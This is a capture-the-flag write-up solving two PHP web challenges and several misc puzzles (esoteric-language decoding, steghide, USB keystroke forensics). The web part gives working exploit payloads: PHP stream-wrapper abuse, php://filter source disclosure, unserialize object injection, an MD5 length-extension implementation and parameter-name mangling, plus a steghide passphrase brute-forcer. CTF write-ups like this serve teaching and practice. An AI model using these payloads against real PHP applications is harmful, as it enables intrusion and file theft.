Web
EasyPhp
<?php
$sz_txt = $_GET["sz_txt"];
$sz_file = $_GET["sz_file"];
$password = $_GET["password"];
if(isset($sz_txt)&&(file_get_contents($sz_txt,'r')==="welcome to jxsz")){
echo "<br><h1>".file_get_contents($sz_txt,'r')."</h1></br>";
if(preg_match("/flag/",$sz_file)){
echo "Not now!";
exit();
}else{
include($sz_file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
$sz_txt: file_get_contents() has to return exactly "welcome to jxsz", so feed the content in through a stream wrapper, either data:// (requires allow_url_fopen) or php://input (the raw POST body, no ini requirement). $sz_file then goes straight into include(); the /flag/ regex only inspects that file name, and a plain include of useless.php would execute it instead of showing it, so read it through the php://filter wrapper as base64:
?sz_txt=data:text/plain,welcome to jxsz&sz_file=php://filter/read=convert.base64-encode/resource=useless.php
Base64-decode the output to get the useless.php source:
<?php
class Flag{
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
?>
Build the deserialization PoC by setting the public $file property to flag.php. After include($sz_file) has defined the class, unserialize($password) restores the object and echo $password triggers __toString() (PHP method names are case-insensitive, so the lowercase __tostring is honoured), which prints the file contents. The /flag/ filter never looks at $password, so flag.php is allowed there.
<?php
class Flag{
public $file = "flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("So cool,continue plz");
}
}
}
$res = new Flag();
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
php://input is used for $sz_txt, so the request has to be a POST. Capture one in the proxy and set the GET parameters to:
?sz_txt=php://input&sz_file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
with the POST body:
welcome to jxsz
flag{4a5a802f-6a37-44d4-8a49-e9066dfd6474}
parseHash
<?php
include("key.php");
class person{
public $aa;
public $bb;
public $username;
public $password;
public function __construct($key=''){
$this->username="jxsz";
$this->password="jxsz";
if(strlen($key)==16&&md5($key . urldecode( $this->username . $this->password)=="a1133ca71ed6320a0255b0d53188be57")){
echo "Welcome";
}
}
public function __destruct(){
$this->aa = (string)$this->aa;
if(strlen($this->aa) > 5 || strlen($this->bb) > 5||preg_match('/INF|NAN|M_/i', $this->aa)){
die("no no no");
}
if($this->aa !== $this->bb && md5($this->aa) === md5($this->bb) && $this->aa != $this->bb){
echo file_get_contents("/flag");
}
}
}
highlight_file(__FILE__);
$person=new person($key);
$other_pwd=$_POST["pwd1"];
$other_hash=$_POST["hash_code"];
if(md5($key . urldecode("jxsz" . $other_pwd))==$other_hash&&strpos(urldecode($other_pwd),"szxy666")>0){
echo "66666666666";
unserialize($_GET['sz_sz.sz']);
}
This is a modified version of easytrick from the national competition (国赛). It combines three tricks: a hash length extension attack, passing a PHP parameter name that contains illegal characters, and a floating-point precision bypass.
Hash length extension attack
What the constructor gives away:
$this->username = "jxsz"
$this->password = "jxsz"
strlen($key) == 16
md5($key . urldecode($this->username . $this->password)) == "a1133ca71ed6320a0255b0d53188be57"
So the leaked digest is md5($key . "jxszjxsz"), computed over a 16 + 8 = 24-byte message. The POST check computes md5($key . urldecode("jxsz" . $other_pwd)): the server prepends one "jxsz" itself, so from the attacker's side the unknown prefix is $key . "jxsz", strlen($key) + strlen("jxsz") = 20 bytes, and $other_pwd must supply the second "jxsz", the original MD5 padding and the appended data.
Last condition: the decoded string must contain "szxy666", and not at offset 0 (strpos(...) > 0). The appended data satisfies this automatically because it lands after the padding.
hashpump
Generate the pair with a hash length extension tool. HashPump (https://github.com/bwall/HashPump), given the known signature, the data jxsz, key length 20 and szxy666 as the data to append, prints the new signature and the message to send (the trailing \xc0\x00\x00\x00\x00\x00\x00\x00 is the 64-bit little-endian bit count 192 = 24 bytes * 8 of the original message):
ec789edf786174babd157da5492e1850
jxsz\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00szxy666
Write every raw byte as %XX (\x00 becomes %00, \x80 becomes %80, \xc0 becomes %c0) and send the pair as POST fields. PHP decodes the body once, and the script's own urldecode() then runs over bytes that contain no % or +, so a single layer of encoding is correct. The server answers 66666666666, which confirms the forged hash was accepted and the unserialize() call is reachable:
pwd1=jxsz%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c0%00%00%00%00%00%00%00szxy666&hash_code=ec789edf786174babd157da5492e1850
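As an added example (my code, not the write-up's or HashPump's), the same length extension computed from scratch in Python so the glue and the forged digest can be checked offline: a minimal MD5 that can be resumed from a known digest, the padding for the 24-byte message $key . "jxszjxsz", the forged hash after appending szxy666, and a Python stand-in for the server-side check. The 16-byte key 0123456789abcdef is a constructed placeholder for key.php; against the real target you would pass the leaked digest a1133ca71ed6320a0255b0d53188be57 to parsehash_payload() instead of computing one.

```python
# Added example: MD5 length extension for the parseHash check, computed offline.
import hashlib
import math
import struct
import urllib.parse

MASK32 = 0xFFFFFFFF
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK32 for i in range(64)]   # RFC 1321 constants
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def _rotl(x, c):
    return ((x << c) | (x >> (32 - c))) & MASK32


def _compress(state, block):
    """One MD5 compression of a 64-byte block, returning the updated (a, b, c, d)."""
    m = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & MASK32
    return tuple((x + y) & MASK32 for x, y in zip(state, (a, b, c, d)))


def md5_padding(total_len):
    """Bytes MD5 appends to a total_len-byte message: 0x80, zeros up to 56 mod 64, 64-bit LE bit count."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack("<Q", (total_len * 8) & 0xFFFFFFFFFFFFFFFF)


def md5_hex(data, state=_IV, consumed=0):
    """MD5 of data. With state/consumed given, continues a hash whose first `consumed` bytes
    are already absorbed into `state`; that is all a length extension needs."""
    padded = data + md5_padding(consumed + len(data))
    for off in range(0, len(padded), 64):
        state = _compress(state, padded[off:off + 64])
    return struct.pack("<4I", *state).hex()


def md5_extend(known_hex, prefix_len, suffix):
    """Given md5(prefix) and len(prefix) but not prefix itself, return (glue, forged) such that
    md5(prefix + glue + suffix) == forged."""
    state = struct.unpack("<4I", bytes.fromhex(known_hex))
    glue = md5_padding(prefix_len)
    return glue, md5_hex(suffix, state, prefix_len + len(glue))


def parsehash_payload(known_hex, key_len=16):
    """POST fields for parseHash. The leaked digest covers $key . "jxszjxsz" (key_len + 8 bytes);
    the server hashes $key . "jxsz" . $pwd1, so pwd1 itself must start with the second "jxsz"."""
    glue, forged = md5_extend(known_hex, key_len + 8, b"szxy666")
    raw = b"jxsz" + glue + b"szxy666"
    # %XX-encode every byte. PHP decodes the POST body once and the script urldecode()s again,
    # but the raw padding bytes contain no '%' or '+', so one layer of encoding is enough.
    return {"pwd1": urllib.parse.quote(raw, safe=""), "hash_code": forged}


def simulate_server(key, pwd1, hash_code):
    """The page's PHP check re-done in Python: md5($key.urldecode("jxsz".$pwd1)) == hash_code
    and strpos(urldecode($pwd1), "szxy666") > 0."""
    other_pwd = urllib.parse.unquote_to_bytes(pwd1)        # what lands in $_POST["pwd1"]
    decoded = urllib.parse.unquote_to_bytes(other_pwd)     # the script's own urldecode()
    return hashlib.md5(key + b"jxsz" + decoded).hexdigest() == hash_code and decoded.find(b"szxy666") > 0


def selftest():
    """Compare the hand-written MD5 with hashlib around the block and padding boundaries."""
    return all(md5_hex(b"x" * n) == hashlib.md5(b"x" * n).hexdigest() for n in (0, 3, 55, 56, 63, 64, 65, 200))


def demo(key=b"0123456789abcdef"):
    """Constructed 16-byte key standing in for key.php; returns (payload, accepted_by_server)."""
    known = hashlib.md5(key + b"jxszjxsz").hexdigest()     # a1133ca7... on the real target
    payload = parsehash_payload(known, key_len=len(key))
    return payload, simulate_server(key, payload["pwd1"], payload["hash_code"])


if __name__ == "__main__":
    payload, accepted = demo()
    print(payload["pwd1"], payload["hash_code"], accepted)
```

The glue returned for a 24-byte prefix is \x80, 31 zero bytes and the bit count \xc0\x00\x00\x00\x00\x00\x00\x00, i.e. the same bytes HashPump printed above; HashPump's "key length" argument is 20 and not 16 precisely because the server concatenates "jxsz" in front of pwd1 before hashing.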
GET parameter names with illegal characters
unserialize($_GET['sz_sz.sz']);
A parameter literally named sz_sz.sz cannot be delivered: when PHP registers request variables it rewrites '.' and ' ' in the name to '_', so $_GET['sz_sz.sz'] would never be populated. The handling in php-src that matters here: https://github.com/php/php-src/commit//fc4d462e947828fdbeac6020ac8f34704a218834?branch=fc4d462e947828fdbeac6020ac8f34704a218834&diff=unified
Reading that code shows the exception: as soon as PHP meets a '[' it assumes array syntax and stops sanitising the name, and if no closing ']' follows, only that single '[' is turned into '_' while the rest of the name, dot included, is kept. So the parameter is sent as sz[sz.sz, which PHP stores under sz_sz.sz:
?sz[sz.sz=
The last step is the easytrick technique from the national competition, except that INF and NAN are filtered here (preg_match('/INF|NAN|M_/i')). The gate can still be passed with a float that needs more than 14 significant digits: (string)$aa is rendered with the precision ini setting (14 by default), so 5.6000000000000005 becomes "5.6" (3 characters, within the length limit); md5() casts $bb the same way, so the two digests match; "5.6" !== $bb holds because the types differ; and "5.6" != 5.6000000000000005 compares the numeric string as a number, so it holds as well. serialize() on the other hand uses serialize_precision (-1, shortest round-trip form, by default since PHP 7.1), which keeps the full 5.6000000000000005 in the payload. The serialized PoC:
<?php
class person{
public $aa;
public $bb;
}
$res = new person();
$res->aa = 0.8 * 7;
$res->bb = 7 * 0.8;
echo serialize($res);
?>
PS C:\Users\Administrator\Desktop> php .\test.php
O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
payload
?sz[sz.sz=O:6:"person":2:{s:2:"aa";d:5.6000000000000005;s:2:"bb";d:5.6000000000000005;}
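One added example (my code, not from the write-up) that finishes this chain and also covers the EasyPhp payload earlier on the page: a Python emulation of PHP's request-variable name rewriting, a hand-rolled serialize() for objects with string and float public members, and the __destruct() gate re-done in Python so a candidate (aa, bb) pair can be checked before it is sent. The mangling rules follow php_register_variable_ex() in php_variables.c as described above; php_string_cast() assumes the default precision=14 and php_serialize() the default serialize_precision=-1.

```python
# Added example: PHP parameter-name mangling, hand-rolled serialize() and the float gate.
import hashlib
import re
import urllib.parse


def php_mangle_name(name):
    """How PHP rewrites a request variable name (php_register_variable_ex in php_variables.c):
    leading spaces are dropped, '.' and ' ' before the first '[' become '_', and a '[' that
    never gets a closing ']' is itself replaced by '_' while everything after it is kept."""
    name = name.lstrip(" ")
    head, bracket, tail = name.partition("[")
    head = head.replace(".", "_").replace(" ", "_")
    if not bracket:
        return head
    if "]" in tail:
        return head              # genuine array syntax: value is stored under $_GET[head][...]
    return head + "_" + tail     # unterminated '[': only this one character is rewritten


def php_serialize(cls, props):
    """serialize() for an object with string and float public members. Floats use PHP's default
    serialize_precision=-1, the shortest round-trip form, which Python's repr() also produces
    (integral floats, which PHP writes without '.0', are not needed here)."""
    body = ""
    for key, val in props.items():
        body += 's:%d:"%s";' % (len(key.encode()), key)
        if isinstance(val, float):
            body += "d:%s;" % repr(val)
        else:
            body += 's:%d:"%s";' % (len(val.encode()), val)
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)


def php_string_cast(x):
    """(string)$float, and the cast md5() applies, under the default ini precision=14."""
    return "%.14G" % x


def destruct_passes(aa, bb):
    """person::__destruct() from the page for two float members: aa becomes a string, both string
    forms must be <= 5 chars without INF/NAN/M_, then aa !== bb (string vs float: always true),
    md5 equal (both cast the same way) and aa != bb (numeric string vs float compares as numbers)."""
    aa_s, bb_s = php_string_cast(aa), php_string_cast(bb)
    if len(aa_s) > 5 or len(bb_s) > 5 or re.search(r"INF|NAN|M_", aa_s, re.I):
        return False
    md5_same = hashlib.md5(aa_s.encode()).hexdigest() == hashlib.md5(bb_s.encode()).hexdigest()
    return md5_same and float(aa_s) != bb


def build_parsehash_query(aa=0.8 * 7, bb=7 * 0.8):
    """The final GET for parseHash: the name must survive mangling as sz_sz.sz and the value
    must pass __destruct(); the check is done locally before anything is sent."""
    name = "sz[sz.sz"
    if php_mangle_name(name) != "sz_sz.sz" or not destruct_passes(aa, bb):
        raise ValueError("payload would not reach file_get_contents('/flag')")
    poc = php_serialize("person", {"aa": aa, "bb": bb})
    return "?%s=%s" % (name, urllib.parse.quote(poc, safe=""))


def build_easyphp_password():
    """The $password value for EasyPhp: a Flag object whose __toString() reads flag.php."""
    return php_serialize("Flag", {"file": "flag.php"})


if __name__ == "__main__":
    print(build_easyphp_password())
    print(build_parsehash_query())
```

build_parsehash_query() URL-encodes the serialized value but deliberately leaves the '[' in the name unencoded, as on the page; PHP decodes parameter names as well, so sz%5Bsz.sz would be mangled to the same sz_sz.sz.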
flag{4a1a802f-6b37-44c4-8b49-e9066ddd6474}
Misc
Checkin
flag{welc0me_to_ganwangbei}
face
The text is Lennyfuck, a Brainfuck dialect in which every command is written as a Lenny face; the interpreter and its command table are at https://github.com/Knorax/Lennyfuck_interpreter
Replace each face with the Brainfuck command from the table to get:
++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->++++<]>++++.<+++++[->-----<]>---------.<++++[->++++<]>++++++.++++++.<++++[->----<]>------.<+++[->+++<]>+++.<+++++[->-----<]>----.<+++++[->+++++<]>++++++++.++++++++.<++++[->----<]>--------.+++.<++++[->++++<]>.<++++[->----<]>-.++++++++.+++++.<+++[->---<]>------.+++++++.-----.++.++.------.<+++++[->-----<]>-----.<++++++[->++++++<]>+++++++++.<+++[->---<]>-.-----.<++++[->----<]>---.<+++++[->+++++<]>.+++++++++..<+++[->+++<]>++.<++++[->----<]>---.<+++[->+++<]>++++++.<++++[->----<]>--.++++++++.<++++[->++++<]>++.<
and run the result in an online Brainfuck interpreter, e.g. https://sange.fi/esoteric/brainfuck/impl/interp/i.html
flag{You_kNow_brain_face_And_Lennyfuck}
DestroyJava
The attachment is an mp4 whose video is about destroying Java and contains no clue by itself. binwalk shows a picture embedded in the mp4; carving it out with foremost yields a jpg, and steghide info on that jpg reports embedded data protected by a passphrase. Brute-force the passphrase with a wordlist:
# -*- coding: utf8 -*-
# python3
import subprocess


def brute_force(stego_file='flag.jpg', extract_file='output.txt', pass_file='password.txt'):
    # stego_file: the carved picture; extract_file: where the hidden content is written;
    # pass_file: the passphrase wordlist, one candidate per line
    errors = ['could not extract', 'steghide --help', 'Syntax error']
    with open(pass_file, 'r', errors='replace') as f:
        for line in f:
            passphrase = line.strip()
            # argument list rather than a shell string, so quotes in a passphrase cannot break the command
            cmd = ['steghide', 'extract', '-sf', stego_file, '-xf', extract_file, '-p', passphrase, '-f']
            p = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
            content = p.stdout.decode('utf-8', 'replace')   # the original used 'gbk' for a Chinese Windows console
            if not any(err in content for err in errors):
                print(content, end='')
                print('the passphrase is %s' % passphrase)
                return passphrase
    return None


if __name__ == '__main__':
    brute_force()
    print('ok')
The passphrase turns out to be password, and the extracted hidden file hide.txt contains a string that looks like base85:
W^7?+drDz;VP7$GUvy|?Ut&dbbYE;iZfA92XJub$ZeLVrWnXu1a%^OM
Online base85 decoders fail on it because most of them implement Adobe's Ascii85, whose alphabet runs from '!' to 'u' and does not contain '|'; this string uses the RFC 1924 alphabet, which is what Python's base64 module expects, so base64.b85decode() yields the flag:
flag{Java_1s_the_bEst_lAnguage_in_The_world}
Hidepig
pig.pdf is a document about postpartum care for sows, so the guess is PDF steganography, specifically wbStego4open, which asks for a password. The password should be in pig2.pcapng; opening it in Wireshark shows USB traffic, so this is USB keyboard forensics.
USB keyboard data forensics script: https://github.com/WangYihang/UsbKeyboardDataHacker
It works on the HID reports tshark exports with
tshark -r ./example.pcap -T fields -e usb.capdata
and maps them back to keystrokes, so run it directly on the capture:
python UsbKeyboardDataHacker.py ./pig2.pcapng
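As an added example (my code, not the UsbKeyboardDataHacker script), the decoding step itself in Python, run over a constructed set of report lines in the format tshark prints: each 8-byte boot-protocol keyboard report carries the modifier bits in byte 0 and up to six pressed keys in bytes 2 to 7, so a key is emitted when it first appears, Shift selects the upper symbol, Backspace deletes, and key-up reports and non-keyboard packets contribute nothing. The keycode table is the standard USB HID keyboard page, limited to the US-layout characters a flag is likely to use.

```python
# Added example: decode USB keyboard HID reports exported with tshark.
# Keyboard usage IDs (USB HID Usage Tables, keyboard/keypad page) -> (plain, with Shift)
_KEYMAP = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    _KEYMAP[0x04 + i] = (ch, ch.upper())
for i, (plain, shifted) in enumerate(zip("1234567890", "!@#$%^&*()")):
    _KEYMAP[0x1E + i] = (plain, shifted)
_KEYMAP.update({
    0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"),
    0x2F: ("[", "{"), 0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
    0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x22   # byte 0 of the report: bit 1 = left Shift, bit 5 = right Shift


def parse_report(line):
    """One tshark output line ('00:00:13:00:00:00:00:00' or '0000130000000000') -> 8 bytes,
    or None for blank lines and packets whose data is not an 8-byte keyboard report."""
    hexstr = line.strip().replace(":", "")
    if len(hexstr) != 16:
        return None
    try:
        return bytes.fromhex(hexstr)
    except ValueError:
        return None


def decode_keystrokes(lines):
    """Rebuild typed text from boot-protocol keyboard reports. Only keys that were not down in
    the previous report are emitted, so a held key (repeated in consecutive reports) and the
    all-zero key-up report add nothing."""
    text = []
    previously_down = set()
    for line in lines:
        report = parse_report(line)
        if report is None:
            continue
        shift = bool(report[0] & SHIFT_MASK)
        down = {k for k in report[2:8] if k}
        for key in sorted(down - previously_down):
            if key == BACKSPACE:
                if text:
                    text.pop()
            elif key in _KEYMAP:
                text.append(_KEYMAP[key][1 if shift else 0])
        previously_down = down
    return "".join(text)


# Constructed sample in the format of `tshark -r cap.pcapng -T fields -e usb.capdata`:
# types "Pig_2", then a mistyped "x" removed with Backspace, then Enter.
SAMPLE_LINES = [
    "02:00:13:00:00:00:00:00",   # left Shift + p
    "00:00:00:00:00:00:00:00",   # key up
    "00:00:0c:00:00:00:00:00",   # i
    "00:00:0c:00:00:00:00:00",   # i still held: must not repeat
    "00:00:00:00:00:00:00:00",
    "00:00:0a:00:00:00:00:00",   # g
    "00:00:00:00:00:00:00:00",
    "20:00:2d:00:00:00:00:00",   # right Shift + '-'  ->  '_'
    "00:00:00:00:00:00:00:00",
    "00:00:1f:00:00:00:00:00",   # 2
    "00:00:00:00:00:00:00:00",
    "00:00:1b:00:00:00:00:00",   # x (typo)
    "00:00:00:00:00:00:00:00",
    "00:00:2a:00:00:00:00:00",   # Backspace
    "00:00:00:00:00:00:00:00",
    "",                          # non-HID packet: tshark prints an empty field
    "00:00:28:00:00:00:00:00",   # Enter
    "00:00:00:00:00:00:00:00",
]


def demo():
    return decode_keystrokes(SAMPLE_LINES)


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LINES
    print(decode_keystrokes(source))
```

On newer Wireshark releases the field is usbhid.data rather than usb.capdata; the line format is the same. Keyboards with a longer report descriptor produce reports that are not 8 bytes and are skipped by parse_report(), which is the first place to look if the output comes back empty.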
That recovers the password. Then extract the hidden file from the pdf with wbStego4open (download: http://www.bailer.at/wbstego/fs_download.html): enter the password and choose the output file.
flag{pDF_1s_r2a1ly_intEresT1ng}